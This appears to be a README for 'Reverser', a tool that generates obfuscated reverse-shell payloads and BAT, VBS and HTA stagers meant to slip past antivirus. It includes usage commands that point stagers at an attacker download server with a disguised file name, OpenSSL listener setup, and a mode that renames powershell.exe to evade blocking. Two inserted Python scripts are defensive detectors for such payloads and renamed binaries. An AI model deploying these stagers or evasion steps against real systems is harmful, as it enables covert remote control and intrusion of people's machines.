Reverser is a Python-based tool that creates a reverse shell payload in a variety of file types: PS1, BAT, VBS and HTA. The generated payloads are obfuscated and Base64-encoded, with the aim of bypassing various AV tools.

Reverser: Reverse Shell Generator with SSL Encryption

Overview

Reverser is a Python-based tool that generates obfuscated PowerShell scripts, and BAT, VBS or HTA stagers that load them, for establishing a reverse shell over an SSL-encrypted connection. It is intended for penetration testing scenarios where the goal is to bypass security mechanisms on a target machine and get an encrypted connection back to the tester's listener.

Features

  • Reverse Shell with SSL Encryption: Generates PowerShell scripts that establish an SSL-encrypted reverse shell connection.
  • Obfuscation: Each generated PowerShell script uses randomly generated variable names, so two runs of the tool do not share a static signature for signature-based detection to match.
  • Base64 Encoding: The PowerShell scripts are encoded in Base64 as an additional layer of obfuscation.
  • Batch File Generation: Creates a BAT file that downloads the encoded PowerShell script from a remote server and executes it in memory.
  • VBS File Generation: Creates a VBS file that downloads the encoded PowerShell script from a remote server and executes it in memory.
  • HTA File Generation: Creates an HTA file that downloads the encoded PowerShell script from a remote server and executes it in memory.
  • Customizable: Users specify the IP address and port of the reverse shell listener, and the server URL from which the PowerShell script is downloaded.

Prerequisites

  • Python 3.x
  • OpenSSL (for certificate generation)

Installation

Create a virtual environment, clone the repository into it and install the dependencies:

python3 -m venv Reverser
source Reverser/bin/activate
cd Reverser
git clone https://github.com/ShkudW/Reverser.git
cd Reverser
pip install -r requirements.txt

How it works

The tool can generate four types of file, as chosen by the user:

  • A single PS1 file, obfuscated and Base64-encoded, containing the reverse shell payload.
  • A BAT file that connects to a remote server to download and execute the encoded PS1 file.
  • A VBS file that connects to a remote server to download and execute the encoded PS1 file.
  • An HTA file that connects to a remote server to download and execute the encoded PS1 file.

The BAT, VBS and HTA stagers fetch the PS1 file into memory from the download server (listener.py), which presents a self-signed certificate when started with -https_port (it can also serve over plain HTTP with -http_port). Once the script is in memory, the stager decodes it, and the decoded script opens a second SSL-encrypted connection, to the OpenSSL listener, for the reverse shell itself.

Both legs of the communication are therefore encrypted in transit. Note that a stager cannot validate a self-signed certificate, so the download channel is encrypted but not authenticated, and a TLS-inspecting proxy on the target network will still see the script in the clear.
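Random variable names plus Base64 only defeat detection that matches the raw bytes; anything that decodes and normalizes the script first sees the same template every time. The following Python example, added here and not part of Reverser, decodes a Base64-wrapped script, renames user variables to a canonical sequence, collapses whitespace and case, and hashes the result, so two differently-obfuscated copies of the same template collide on one hash. It assumes the Base64 wraps either UTF-16LE (the powershell.exe -EncodedCommand convention) or UTF-8, since the page does not say which Reverser emits; the sample scripts SAMPLE_A, SAMPLE_B and SAMPLE_C are constructed for the demonstration and are not tool output.

```python
import base64
import hashlib
import re

# Automatic/reserved PowerShell variables that must keep their names
# (renaming $true or $_ would change the script's meaning).
RESERVED = {
    "_", "true", "false", "null", "env", "args", "input", "this", "psitem",
    "error", "host", "pwd", "pid", "home", "psscriptroot", "psversiontable",
    "matches", "lastexitcode", "profile", "executioncontext",
}
VAR_RE = re.compile(r"\$([A-Za-z_][A-Za-z0-9_]*)")


def decode_ps_base64(blob: str) -> str:
    """Decode a Base64-wrapped PowerShell script to text.

    powershell.exe -EncodedCommand expects UTF-16LE, but some stagers wrap a
    UTF-8 script instead; the README does not say which Reverser uses
    (assumption), so try UTF-16LE first and fall back to UTF-8.
    """
    raw = base64.b64decode(blob)
    try:
        text = raw.decode("utf-16-le")
        if text.isascii():          # a genuine UTF-16LE script decodes to plain ASCII
            return text
    except UnicodeDecodeError:       # odd length: cannot be UTF-16LE
        pass
    return raw.decode("utf-8")


def normalize_variables(script: str) -> str:
    """Rename every user variable to $v0, $v1, ... in order of first appearance."""
    mapping: dict = {}

    def repl(m: re.Match) -> str:
        key = m.group(1).lower()     # PowerShell variable names are case-insensitive
        if key in RESERVED:
            return m.group(0)
        if key not in mapping:
            mapping[key] = f"$v{len(mapping)}"
        return mapping[key]

    return VAR_RE.sub(repl, script)


def structural_hash(blob: str) -> str:
    """SHA-256 over the decoded, variable-normalized, whitespace-collapsed,
    case-folded script: identical for every re-obfuscation of one template."""
    text = normalize_variables(decode_ps_base64(blob))
    canon = re.sub(r"\s+", " ", text).strip().lower()
    return hashlib.sha256(canon.encode("utf-8")).hexdigest()


# Constructed samples (not Reverser output): the same TLS-connect skeleton with
# two different sets of random variable names, spacing and casing.
SAMPLE_A = (
    "$client = New-Object System.Net.Sockets.TcpClient('10.0.0.5', 443)\n"
    "$ssl = New-Object System.Net.Security.SslStream($client.GetStream(), $false, {$true})\n"
    "$ssl.AuthenticateAsClient('reception')\n"
)
SAMPLE_B = (
    "$kq7x = New-Object System.Net.Sockets.TcpClient('10.0.0.5', 443)\n"
    "$Zp2  =   New-Object System.Net.Security.SslStream($kq7x.GetStream(), $FALSE, {$True})\n"
    "$zp2.AuthenticateAsClient('reception')\n"
)
# Same skeleton but a different port: must not collide with A or B.
SAMPLE_C = SAMPLE_A.replace("443", "8443")

ENCODED_A = base64.b64encode(SAMPLE_A.encode("utf-16-le")).decode()  # -EncodedCommand style
ENCODED_B = base64.b64encode(SAMPLE_B.encode("utf-8")).decode()      # plain UTF-8 wrapping
ENCODED_C = base64.b64encode(SAMPLE_C.encode("utf-16-le")).decode()

if __name__ == "__main__":
    for name, blob in (("A", ENCODED_A), ("B", ENCODED_B), ("C", ENCODED_C)):
        print(name, structural_hash(blob)[:16])
```

A and B hash identically while C, which differs in one literal, does not; the same normalization applied to whatever the generated PS1 actually contains is what a detection pipeline would do before comparing against a known template.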

Usage

Creating only a PS1 file (obfuscated and Base64-encoded):

python3 Reverser.py -ip <Your_IP> -port <Your_PORT> -type ps1


Creating a VBS file and pointing it at the URL where the listener server will host the PS1 file:

python3 Reverser.py -ip <Your_IP> -port <Your_PORT> -type vbs -server https://<Your_Listener_Server_IP>/download/photo/corgi.png.ps1


Creating a BAT file and pointing it at the URL where the listener server will host the PS1 file:

python3 Reverser.py -ip <Your_IP> -port <Your_PORT> -type bat -server https://<Your_Listener_Server_IP>/download/photo/corgi.png.ps1



Opening the listeners:

Open a listener with OpenSSL's s_server to receive the reverse shell connection, using the self-signed certificate and key generated with OpenSSL (see Prerequisites):

openssl s_server -accept <Your_PORT> -cert reception.pem -key reception.key -quiet

Open the tool's own download server, which handles the initial request from the BAT/VBS/HTA stager and serves the PS1 file. Use -https_port for the encrypted channel or -http_port for plain HTTP:

python3 listener.py -https_port|-http_port <Your_Listener_Server_PORT>

All the traffic is encrypted (screenshot in the repository).

Once the PS1 file has been downloaded into memory over the encrypted connection, the encrypted reverse shell arrives at the OpenSSL listener (screenshot in the repository).

Update to the tool from 01/09/2024:

I added the -lolbas flag. It applies only when creating a VBS file, and is meant for organizations where running powershell.exe is blocked by name. In this mode the generated VBS copies powershell.exe from its original path

'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

to a location where the user executing the payload has write permission, under a newly generated file name (a different name on every run).

The download of the PS1 reverse shell payload then runs from that renamed copy of powershell.exe instead of the original:

Creating the VBS file with the -lolbas flag (screenshot in the repository).

The resulting VBS file (screenshot in the repository).
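The copied binary is byte-for-byte the original, so its Authenticode signature still validates and its version resource is unchanged; the OriginalFilename string in that resource (PowerShell.EXE) is what Sysmon reports as OriginalFileName and what the usual "renamed PowerShell" detections key on, regardless of the random name on disk. The following Python script, added here and not part of Reverser, shows that check: it scans a directory for PE files whose version resource says PowerShell.EXE but whose file name does not. It reads the resource by byte-pattern scan rather than a full resource-directory walk, so it needs no third-party PE parser; the FAKE_PE bytes and the file name xq3lm.exe are constructed for the demonstration and are not a real executable.

```python
import tempfile
from pathlib import Path
from typing import List, Optional

# VS_VERSIONINFO stores its strings as NUL-terminated UTF-16LE "key", "value"
# pairs, each padded to a 4-byte boundary. powershell.exe ships with
# OriginalFilename = "PowerShell.EXE", and a plain file copy keeps that intact.
KEY = "OriginalFilename".encode("utf-16-le")
NUL2 = b"\x00\x00"


def _read_utf16z(data: bytes, pos: int) -> str:
    """Read a NUL-terminated UTF-16LE string starting at an even offset."""
    units = []
    while pos + 1 < len(data) and data[pos:pos + 2] != NUL2:
        units.append(data[pos:pos + 2])
        pos += 2
    return b"".join(units).decode("utf-16-le", errors="replace")


def pe_original_filename(data: bytes) -> Optional[str]:
    """Return the OriginalFilename from a PE image's version resource, or None."""
    if data[:2] != b"MZ":
        return None
    idx = data.find(KEY)
    if idx < 0 or idx % 2:            # must sit on a UTF-16 code-unit boundary
        return None
    pos = idx + len(KEY)
    while data[pos:pos + 2] == NUL2:  # skip key terminator and alignment padding
        pos += 2
    return _read_utf16z(data, pos) or None


def find_renamed_powershell(root: str) -> List[str]:
    """Paths under root whose version resource says PowerShell.EXE but whose
    on-disk name does not: the artefact the -lolbas mode leaves behind."""
    hits = []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        orig = pe_original_filename(p.read_bytes())
        if orig and orig.lower() == "powershell.exe" and p.name.lower() != "powershell.exe":
            hits.append(str(p))
    return sorted(hits)


# Constructed sample: a fake "PE" carrying only the MZ magic and the
# version-resource string pair. It is not a real executable.
FAKE_PE = (
    b"MZ" + b"\x00" * 62
    + KEY + NUL2 + NUL2                        # key, terminator, alignment pad
    + "PowerShell.EXE".encode("utf-16-le") + NUL2
)


def build_sample_dir() -> str:
    """Temp tree with the legitimate name, a -lolbas style copy under a
    hypothetical random name, and an unrelated non-PE file."""
    root = tempfile.mkdtemp(prefix="lolbas_")
    (Path(root) / "powershell.exe").write_bytes(FAKE_PE)
    (Path(root) / "xq3lm.exe").write_bytes(FAKE_PE)
    (Path(root) / "notes.txt").write_bytes(b"not a PE at all")
    return root


if __name__ == "__main__":
    for hit in find_renamed_powershell(build_sample_dir()):
        print("renamed powershell.exe:", hit)
```

Only the copy under the random name is reported; the legitimately named file and the text file are ignored. The same mismatch between OriginalFileName and Image is the condition to alert on in process-creation telemetry.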

Enjoy :)
